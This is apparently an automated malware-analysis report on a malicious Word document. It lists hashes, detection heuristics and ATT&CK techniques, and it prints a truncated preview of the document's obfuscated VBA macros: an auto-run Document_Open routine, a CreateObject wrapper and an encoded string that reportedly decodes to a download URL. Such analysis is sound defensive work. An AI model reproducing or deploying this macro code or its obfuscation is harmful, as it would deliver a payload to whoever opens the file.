Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 22af46f4b02926c8…

MALICIOUS

Office (OLE)

Size: 92.5 KB · Created: 2016-05-30 00:59:00 · Authoring application: Microsoft Office Word · First seen: 2017-12-09
MD5: 42829c3a0e8676fa2c5db36db0cc6ce0 SHA-1: a52af2c3d7facee9224586619828d6efc15670db SHA-256: 22af46f4b02926c81d6aba69cec9e642d2fb0d6dde8eb01a6d962d7cefa13b97
Risk score: 182

Malware Insights

MITRE ATT&CK
T1059.005 — Visual Basic; T1566.001 — Spearphishing Attachment

The sample contains VBA macros, including a Document_Open macro that runs automatically when the document is opened — a common initial-execution technique. The macro code calls CreateObject and CallByName, which indicates it is designed to instantiate and drive external objects rather than merely manipulate the document. The VBA is heavily obfuscated (junk procedures, meaningless identifiers, and string constants that are only decoded at runtime by a helper routine), which suggests an attempt to evade inspection; in particular, the one hard-coded string that decodes to what appears to be an HTTP URL never exists in plaintext, which is why the embedded-URL heuristic below reports only benign schema URLs. Taken together, this is consistent with the download and execution of a secondary payload.

Heuristics (6)

  • VBA macros detected (severity: medium; 4 related findings) — OLE_VBA_MACROS
    Document contains VBA macro code.
  • Document_Open macro (severity: high) — OLE_VBA_DOCOPEN
    Document_Open macro present.
  • CreateObject call (severity: high) — OLE_VBA_CREATEOBJ
    CreateObject call present.
  • CallByName call (severity: high) — OLE_VBA_CALLBYNAME
    CallByName call present.
  • VBA p-code auto-exec with execution tokens (severity: high) — OLE_VBA_PCODE_AUTOEXEC_EXEC
    The compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only macro documents, or documents whose macro source could not be extracted, where no visible source is available.
  • Embedded URL (severity: info) — EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    • http://schemas.openxmlformats.org/drawingml/2006/main — in document text (OLE body)
    • http://schemas.openxmlformats.org/officeDocument/2006/bibliography — in document text (OLE body)
    • http://schemas.openxmlformats.org/officeDocument/2006/customXml — in document text (OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 14342 bytes
SHA-256: 4abd1dd03218c8b0b86423fc477df1b549052bf0bec2d0ac84f1d163f070b84a
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Function VoLcdxZvLzq(ByVal dKBQCXA As String, ByVal WysRECgPY As String) As Integer
yCWQIjeGcVY
DMhEJKjVZmfXnG = 6891
IzXQC 4165
AtzeLoUKvWwXGe 7578, "UQQ"
If uAXjw Then
zrpoOXVDkaG "Yg", True, "lfdHN"
YhDNjTcUk "uXh9A", True
DEQyzPHCgy
Else
JcAtqDHxwraeQ 1146
End If
VoLcdxZvLzq = 5291
End Function
Private Sub TeHnddzZhJZz(ByVal rrpHwB As String, ByVal yuGwtCUVja As Integer)
WxFqb "", 5222, True
ViWEMyogYKE
WDwqa 7063
End Sub
Private Function vRZvowQ() As String
If bDtcGRguH Then
ZYMRn
Else
fkmfcBPDmokdUl 2523
End If
vRZvowQ = "Z7Nca"
End Function
Private Sub Document_Open()
Dim NjbPzgKk As String
ncbVZ = 5132
STyXKDIQhbdU.uVCwCvWGpCr
End Sub
Private Function MaNcGp(ByVal JRQGsXpU As Integer, ByVal pEyecaqet As String) As Boolean
BnsRpkuWbFnS 564, 1218, "aK9Y"
AJMeb = 5855
IKZkkdNMoMZ 1901, "ftg"
wKaHTgcvL 7473
iltBFVz 238, "HGJOa", ""
MaNcGp = False
End Function

Attribute VB_Name = "STyXKDIQhbdU"
Private Sub LrNRGl()
Dim IEXcfKLkcQVoh As Integer
ohVbywbeX = 7110
fmarMnNmlC EJUjUnRHA.GYsOMm, 1503, Ubmdx
EJUjUnRHA.CkrHfrqaxSRA EJUjUnRHA.GYsOMm
End Sub
Public Sub uVCwCvWGpCr()
WOyUC = 4891
On Error GoTo BCuAnPCJPY
BoiTZIDhVULEwh.gtDPMeHdO
BoiTZIDhVULEwh.wlRyKBNqqij
LrNRGl
Exit Sub
BCuAnPCJPY:
End Sub
Private Sub fmarMnNmlC(ByVal eNMnklDjU As String, ByVal ifCEnLW As Integer, ByVal saDJpVoIMjc As String)
Dim CvxZoLsiSq As Integer
Set yjwMPB = MhIOBJOfiJs.hlWGYwKkcl("nT8", saDJpVoIMjc, "ng")
MhIOBJOfiJs.ulaxatewXTP yjwMPB, RaAgJTrVJMW.HJELJ("CSajSn'UUtU dJpo9w5nlSo5UadS gjbiSn.5a9ry5J f.i9lJpe", "gp.9SJ5Uj")
EJUjUnRHA.kauvzXYvLutyED eNMnklDjU, OxRcjS.ZteFAywbyvRS(yjwMPB, RaAgJTrVJMW.HJELJ("R7 emsp oQ3nsmemB5mod y ", "5 7Dm3.Q"))
End Sub
Public Function UrgxTrf(ByVal mRHjY As String, ByVal HfqlykSrDqBc As String) As Object
Dim MPYJeqrrxMqWm As String
Dim tFaqRJ As String
Set UrgxTrf = NxHHExRkztSJH(CreateObject(HfqlykSrDqBc), False, False)
End Function
Private Function NxHHExRkztSJH(ByVal pWveYaIRmHM As Object, ByVal hMHRvMo As Boolean, ByVal cdmdaCEUAfuJSZ As Boolean) As Object
Set NxHHExRkztSJH = pWveYaIRmHM
End Function
Private Function Ubmdx() As String
Ubmdx = RaAgJTrVJMW.HJELJ("Yh9tWtpWb:/M/9Yra9vLYirYa9jLbibt.YMcoYmW/Mc9aWLta9lLo9Lg/bbobffM9i9ceb19W1M.WdYatY", "bY9WML")
End Function

Attribute VB_Name = "RaAgJTrVJMW"
Public Function HJELJ(ByVal KKuNtvPGvfyxt As String, ByVal gmnNSHJQAflRv As String) As String
Dim rxdcRr As Boolean
For MJcOYhSUR = ZERVNzrUeTVH To kAzSjkCumyJ.XDaKOXsoNHw("KA", KKuNtvPGvfyxt)
HJELJ = kAzSjkCumyJ.CoxAyynW("T9w", HJELJ, 8054, RbMVQ(gmnNSHJQAflRv, kAzSjkCumyJ.hTblwynf(MJcOYhSUR, "utc", KKuNtvPGvfyxt)))
Next
End Function
Private Sub KTmyoPwZ(ByVal OVovRnAFqdFZjv As Boolean)
VYZBorUyzwC = ""
UuQMAdUIOCoi 4633, ""
oQFbyABW "", "ref79", "0w"
mSfHvffN = False
eiEAEjtEFh "VZA"
qWfGsHxG 7882
tQxESX = 779
ZghyiIEi
End Sub
Private Sub AhXCAMkZx()
If kHqWGUOKHJh Then
OEzGYYadhQLwV
JiXXzpuV = "5uHKs"
End If
End Sub
Private Function RbMVQ(ByVal pKxwbmnUM As String, ByVal AioZDXcuMxU As String) As String
Dim xXXmmgXO As Integer
Dim ZAgnNK As String
If Not kAzSjkCumyJ.aLaBHlk(AioZDXcuMxU, "LtG2", pKxwbmnUM, 4638) Then
RbMVQ = AioZDXcuMxU
End If
End Function
Private Function ZERVNzrUeTVH() As Integer
sAOxfkFRnFQGZ = "NJ8"
ZERVNzrUeTVH = 1
End Function

Attribute VB_Name = "MhIOBJOfiJs"
Private Function fyEhcknnjGD() As String
rDqqFQvjF
EcWNvPdUqpoZ "H0dY", "l7Ml", 1389
TlVKxIFAFjvWiQ
MuBjjhynpkYtqY 2198, 3506, 5073
EesMCJU
fyEhcknnjGD = "wI4"
End Function
Private Function RdFWM() As Integer
RdFWM = 400
End Function
Public Sub ulaxatewXTP(ByVal cNkUBLSmhcQot As Object, ByVal angEurTqDQqC As String)
OxRcjS.LjDNvbNyQq cNkUBLSmhcQot, RaAgJTrVJMW.HJELJ("iSe 7nid", "Zip3 7o")
If OxRcjS.ZteFAywbyvRS(cNkUBL
... (truncated)